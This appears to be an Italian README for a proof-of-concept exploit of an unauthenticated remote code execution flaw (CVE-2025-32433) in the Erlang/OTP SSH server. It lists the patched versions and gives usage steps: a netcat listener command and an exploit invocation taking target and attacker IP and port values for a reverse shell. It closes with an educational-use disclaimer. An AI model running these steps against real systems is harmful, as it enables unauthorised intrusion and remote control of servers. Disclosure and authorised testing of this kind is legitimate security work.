
PoC che mostra l'esecuzione remota di codice non autenticata nel server SSH Erlang/OTP. Sfruttando una vulnerabilità nella gestione dei messaggi del protocollo SSH, un attaccante può eseguire comandi arbitrari sul target senza credenziali valide.
PoC che dimostra esecuzione remota di codice senza autenticazione nel server SSH Erlang/OTP.
Sfruttando un difetto nella gestione dei messaggi del protocollo SSH, un attaccante può eseguire comandi arbitrari sul target senza credenziali valide.
Questo problema è stato corretto in OTP-27.3.3, OTP-26.2.5.11 e OTP-25.3.2.20.
Configurazione del listener:
nc -lvnp 1234
Esegui l'exploit:
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : IP del target--rport : Porta SSH del target--lhost : Il tuo IP per la reverse shell--lport : La porta del tuo listener

Questo repository è solo a scopo educativo. Non utilizzare questo exploit contro sistemi che non possiedi o per cui non hai esplicita autorizzazione a testare. L'uso improprio può essere illegale ed è severamente vietato.